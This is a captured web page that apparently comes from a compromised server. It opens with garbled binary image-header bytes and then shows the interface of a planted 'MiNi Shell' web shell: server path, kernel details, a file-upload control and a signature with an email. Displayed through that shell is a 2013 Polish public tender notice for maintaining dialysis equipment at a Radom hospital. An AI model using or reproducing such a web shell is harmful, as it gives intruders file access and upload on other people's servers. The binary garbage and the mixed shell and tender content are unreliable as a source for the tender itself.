JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130925/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130925/387908-N-2013.html

<p class="kh_header"><b>Radom: Świadczenie usług w zakresie obsługi, konserwacji i nadzoru nad aparaturą i urządzeniami  w Oddziale Dializ Radomskiego Szpitala Specjalistycznego</b><br>
<b>Numer ogłoszenia: 387908 - 2013; data zamieszczenia: 25.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Radomski Szpital Specjalistyczny im. dr Tytusa Chałubińskiego , ul. Lekarska 4, 26-610 Radom, woj. mazowieckie, tel. 48 3615285, 3615284, faks 48 3615213.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.radom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług w zakresie obsługi, konserwacji i nadzoru nad aparaturą i urządzeniami  w Oddziale Dializ Radomskiego Szpitala Specjalistycznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Przedmiot zamówienia
Przedmiotem zamówienia są usługi polegające na wykonywaniu okresowych czynności technicznych związanych z  obsługą, konserwacją i nadzorem nad aparaturą i urządzeniami (stacje uzdatniania wody, reutylizatory, aparaty do hemodializy) znajdującymi się w Oddziale Dializ Radomskiego Szpitala Specjalistycznego, w asortymencie i ilościach określonych szczegółowo w tabeli nr 1 .
1.Pod pojęciem okresowych czynności technicznych należy rozumieć zakres czynności określonych szczegółowo w tabeli nr 2, w tym m. in.:
a) przeprowadzanie wszelkich czynności technicznych w tym procedur związanych z obsługą, konserwacją i nadzorem w celu utrzymania pełnej sprawności aparatury i urządzeń wraz z wymianą części, akcesoriów  i innych materiałów niezbędnych do codziennej eksploatacji.
b) przeprowadzanie niezbędnych kalibracji, dezynfekcji i testów parametrów technicznych dla zapewnienia bezpiecznego działania aparatury i urządzeń.
c) prowadzenie rejestrów/ksiąg wszelkich wykonywanych czynności zwłaszcza procedur związanych z obsługą, konserwacją i nadzorem nad aparaturą i urządzeniami
d) niezwłoczne reagowanie na wezwanie w przypadku awarii aparatury i urządzeń.
Wykonawca będzie  podejmował czynności związane z obsługą, konserwacją i nadzorem nad aparaturą znajdującą się w Oddziale Dializ Radomskiego Szpitala Specjalistycznego: 1 lub 2 razy na dobę; 1 raz w tygodniu; 1 raz na 2 tygodnie; w zależności od potrzeb lub zgodnie z instrukcją obsługi i wymogami sanitarno-epidemiologicznymi. 
Wykonawca będzie reagował na wezwanie w przypadku wystąpienia problemu z obsługą urządzenia będącego przedmiotem umowy w czasie nie dłuższym niż w ciągu 40 min. od momentu zawiadomienia o awarii telefonicznie na nr tel. (podany przez Wykonawcę) przez osobę upoważnioną ze strony Zamawiającego. 
Wykonawca podejmuje w przypadku awarii czynności zaradcze w granicach swoich kompetencji określonych w instrukcji obsługi lub zawiadamia pisemnie kierownika oddziału, a w przypadku nieobecności - lekarzowi dyżurnemu o konieczności interwencji serwisów.
Wykonawca zobowiązuje się do przekazywania informacji o stanie technicznym aparatury i urządzeń Oddziału Dializ  codziennie w godz. 7.00 - 7.15 Lekarzowi dyżurnemu w celu potwierdzenia przez niego własnoręcznym podpisem dokonywanych wpisów w Dziennym Rejestrze Czynności.
2.Należność za wykonanie przedmiotu zamówienia ,w zryczałtowanej kwocie ,będzie rozliczana 1 raz w miesiącu po przedstawieniu przez Wykonawcę faktury VAT lub rachunku. 
II. Tabela nr 1: Wykaz aparatury i urządzeń  znajdujących się w Oddziale Dializ Radomskiego Szpitala  Specjalistycznego  -  stan na dzień. 2013.09.19.
 Lp.	Nazwa	Symbol	 Producent 	Rok produkcji	Nr fab.	Ilość 
I - stacje uzdatniania wody
1.	Stacja uzdatniania wody	RO 700 GS	DWA Niemcy	1994	45	    1
2.	Stacja uzdatniania wody	WRO 104	Gambro Szwecja	1998	974	    1
II - reutylizatory  (urządzenia do reutylizacji dializatorów)
1.	Reutylizator 	RENATRON PA	Minntech Corp.USA	2005	2202	    1
2.	Reutylizator	RENATRON PA 100	Minntech Corp.USA	2009	PA2690	    1
III - aparaty do hemodializy
1.	Aparat do hemodializy	HD 4008 S	Fresenius Medical Niemcy	2005 	5 VCA-AW 40	    1
2.	Aparat do hemodializy	4008 B	Fresenius Medical Niemcy	2009	9V5AML 41	     1
3.	Aparat do hemodializy	4008 B	Fresenius Medical Niemcy	2009	9V5AML 42	     1
4.	Aparat do hemodializy	4008 B	Fresenius Medical Niemcy	2009	9V5AML 44	     1
5.	Aparat do hemodializy	4008 B	Fresenius Medical Niemcy	2009	9V5AML 45	     1
6.	Aparat do hemodializy	4008 B	Fresenius Medical Niemcy	2009	9V5AML 48	     1
7.	Aparat do hemodializy	4008 B	Fresenius Medical Niemcy	2009	9V5AML 50	     1
8.	Aparat do hemodializy	4008 B	Fresenius Medical Niemcy	2009	9V5AML 51	     1
9.	Aparat do hemodializy	4008 S OCM CDS BTM	Fresenius Medical Niemcy	2009	9VCANH 30	      1
10.	Aparat do hemodializy	4008 S OCM CDS BTM	Fresenius Medical Niemcy	2009	9VCANH 34	      1
11.	Aparat do hemodializy	4008 S OCM CDS BTM	Fresenius Medical Niemcy	2009	9VCARB 25	      1
12.	Aparat do hemodializy	4008 S OCM CDS BTM	Fresenius Medical Niemcy	2009	9VCAQY 25	      1
13.	Aparat do hemodializy	AK-95 S	Gambro Szwecja	2003	22256	      1
14.	Aparat do hemodializy	AK-95 S	Gambro Szwecja	2003	22262	      1
15.	Aparat do hemodializy	AK-95 S	Gambro Szwecja	2004	15535	      1
16.	Aparat do hemodializy	AK-95 S	Gambro Szwecja	2005	25495	      1
17.	Aparat do hemodializy	AK-95 S	Gambro Szwecja	2005	25496	      1
18.	Aparat do hemodializy	AK-95 S	Gambro Szwecja	2005	25499	      1
19.	Aparat do hemodializy	AK-95 S	Gambro Szwecja	2005	25500	      1
20.	Aparat do hemodializy	AK-95 S	Gambro Szwecja	2005	25519	      1
21.	Aparat do hemodializy	AK-95 S	Gambro Szwecja	2005	25520	      1
22.	Aparat do hemodializy	AK-95 S	Gambro Szwecja	2006	28712	      1
23.	Aparat do hemodializy	AK-95 S	Gambro Szwecja	2006	28074	      1
24.	Aparat do hemodializy	AK-95 S	Gambro Szwecja	2006	28075	      1
25.	Aparat do hemodializy	AK-95 S	Gambro Szwecja	2006	28088	      1
26.	Aparat do hemodializy	AK-95 S	Gambro Szwecja	2006	28090	      1
III. Tabela nr 2: Zakres czynności objętych przedmiotem zamówienia.  
   NrAparatura/urządzenia,  Zakres czynności,Częstotliwość wykonywania czynności/przewidziany czas trwania czynności    
I.Stacje uzdatniania wody 	1.nadzorowanie sprawności urządzeń	1.1 raz na dobę (częstotliwość w ciągu doby i czas trwania czynności  - do uznania Wykonawcy)
2.sprawdzenie poziomu wody w zbiornikach i ewentualne ich uzupełnianie do wymaganego poziomu oraz kontrola prawidłowości działania głowic sterujących kolumnami i elektrozaworów (tylko stacja wro)	2.2 razy na dobę  godz. :
- 06:30 - 06:45
- 21:15 - 21:30
3.kontrola filtrów 	3.1 raz na dobę zgodnie  z  instrukcją obsługi  urządzeń 
4. wymiana filtrów 	4. w zależności od potrzeb
5.badanie poziomu chloru, twardości  wody- wykonywanie testów  i dokonywanie zapisów w dokumentacji	5.1 raz na dobę zgodnie z wymogami w tym zakresie
6.odwapnianie osmozy	6. 1 raz w tygodniu po zakończeniu dializy sobotniej
7.kontrola poziomu i uzupełnianie soli  tabletkowej	7.1 raz na dobę
II.	
Reutylizatory dializatorów 	1.obsługa urządzeń zgodnie z instrukcją	1.1 raz na dobę
2. kalibracja	2.2 razy na dobę w godz.:
- 6:45 - 7:00
- 21:05 - 21:15 
3. dezynfekcja - Formuła 409	3. 1 raz w tygodniu po zakończeniu dializy sobotniej
III.	
Aparaty do hemodializy 	1.dezynfekcja chemiczna aparatów Fresenius	1. 1 raz na 2 tygodnie (w czasie pomiędzy godz.01:00 w niedzielę a 06:00 w poniedziałek )
2.wymiana części elspolatacyjnych (filtry, uszczelki, membrany) oraz drobnych części uszkodzonych podczas eksploatacji niewymagających obecności serwisu.2. zgodnie z potrzebami i instrukcją obsługi  aparatów
 Pozostałe czynności	1.reakcja na wezwanie w przypadku awarii któregokolwiek urządzenia w czasie nie dłuższym niż 40 min. od momentu zawiadomienia telefonicznego o awarii na nr  (podany przez wykonawcę) przez osobę upoważnioną ze strony Zamawiającego.
2.prowadzenie rejestrów/ksiąg wszelkich wykonywanych czynności zwłaszcza procedur  związanych z obsługą, konserwacją i nadzorem nad aparaturą i urządzeniami
	3. zgłaszanie zapotrzebowania na materiały eksploatacyjne i drobnych części uszkodzone podczas eksploatacji niewymagających obecności serwisu -w formie pisemnej- kierownictwu oddziału.
	4.  zgłaszanie awarii urządzeń wymagających interwencji serwisów -w formie pisemnej-  kierownictwu oddziału, a w przypadku nieobecności - lekarzowi dyżurnemu.
IV. Dodatkowe informacje :  
1.Praca w Oddziale Dializ RSzS : 6 dni w tygodniu (od poniedziałku do soboty) , 
   praca III-zmianowa w godz. 07.00 - 13.00 , 13.00 - 19.00 i 19.00 - 01.00.
2.Aktualne wyposażenie :
- I piętro : 19 stanowisk do hemodializy;
- II pietro : 6 stanowisk do hemodializy;
- 2 reutylizatory do reutylizacji dializatorów.                                                                                                                                                                                                          
- uzdatnacz wody firmy Gambro - piziom minus 1, uzdatnacz wody firmy DWA - piętro II..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9, 50.50.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający  nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca posiada wiedzę i doświadczenie, jeżeli w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje usługi napraw i konserwacji sprzętu i aparatury elektromedycznej na łączną kwotę min. 6.000,00 zł, potwierdzoną przez usługobiorcę.
	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia powinni wykazać, że warunek określony powyżej spełniają łącznie.
	W przypadku, gdy w wykazie zamówień przedstawionym przez Wykonawcę rozliczenia między Wykonawcą, a Zamawiającym za wykonane zamówienie zostało dokonane w innej walucie niż w złotych polskich, Wykonawca (do celu oceny oferty) dokona przeliczenia wartości wykonanych zamówień w innej walucie niż złoty polski na  podstawie średniego kursu złotego w stosunku do walut obcych określonego w tabeli kursów średnich walut obcych Narodowego Banku Polskiego (http://www.nbp.pl) na dzień zamieszczenia ogłoszenia w Biuletynie Zamówień Publicznych: tj. dn. 2013.09.23.
	Zamawiający dokona oceny spełnienia przez Wykonawców warunku udziału w postępowaniu na podstawie złożonych wraz z ofertą oświadczeń i dokumentów według metody spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca dysponuje osobami zdolnymi do wykonania przedmiotu zamówienia, jeżeli wykaże, że dysponuje co najmniej 2 osobami, które posiadają uprawnienia kwalifikacyjne w zakresie obsługi, konserwacji, remontów, montażu i kontrolno-pomiarowym urządzeń elektrycznych wg Grupa 1 pkt. 2) i pkt. 10) załącznika nr 1 do Rozporządzenia Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28.04.2003r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (Dz. U. Nr 89 poz. 828 z późn. zm.). 
	Zamawiający dokona oceny spełnienia przez Wykonawców warunku udziału w postępowaniu na podstawie złożonych wraz z ofertą oświadczeń i dokumentów według metody spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>I. Inne dokumenty wyżej nie wymienione:
1. dokument lub dokumenty, z których będzie wynikać uprawnienie do podpisania oferty: pełnomocnictwo - w oryginale lub w postaci kopii poświadczonej notarialnie,
2. wypełniony formularz oferty - według wzoru załączonego do SIWZ.
II. Wykonawcy wspólnie ubiegający się o zamówienie:
1. Ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązania.
2. Zobowiązani są ustanowić Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo reprezentowaniu w postępowaniu i zawarcia umowy w sprawie zamówienia.
3. Pełnomocnictwo musi wynikać z umowy lub innej czynności prawnej, mieć formę pisemną: fakt ustanowienia Pełnomocnika musi wynikać z załączonych do oferty dokumentów.
4. Pełnomocnictwo składa się w oryginale lub kopii poświadczonej notarialnie.
5. Jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) zostanie wybrana jako najkorzystniejsza, Zamawiający może przed zawarciem umowy żądać przedstawienia w określonym terminie umowy regulującej współpracę tych wykonawców.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje następujące zmiany do umowy:
a). Kwota ryczałtowa brutto określona w paragrafie 6 ust. 1 i 2 (w PLN) może ulec zmianie w przypadku zmiany stawki podatku VAT wprowadzonej przepisami prawa-mogą się zmienić od dnia wejścia w życie danego aktu prawnego, przy czym zmianie ulegnie wyłącznie kwota ryczałtowa brutto, kwota ryczałtowa netto pozostanie bez zmian. 
b). Przedmiotem zmian treści umowy mogą być również zmiany adresowe stron umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.radom.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Radomski Szpital Specjalistyczny, 26-610  Radom, ul. Lekarska 4, III piętro, w pok. nr 308 - Dział Zamówień Publicznych, Funduszy Strukturalnych i Zaopatrzenia..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.10.2013 godzina 11:00, miejsce: Radomski Szpital Specjalistyczny, 26-610  Radom, ul. Lekarska 4, III piętro, w pok. nr 308 - Dział Zamówień Publicznych, Funduszy Strukturalnych i Zaopatrzenia..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com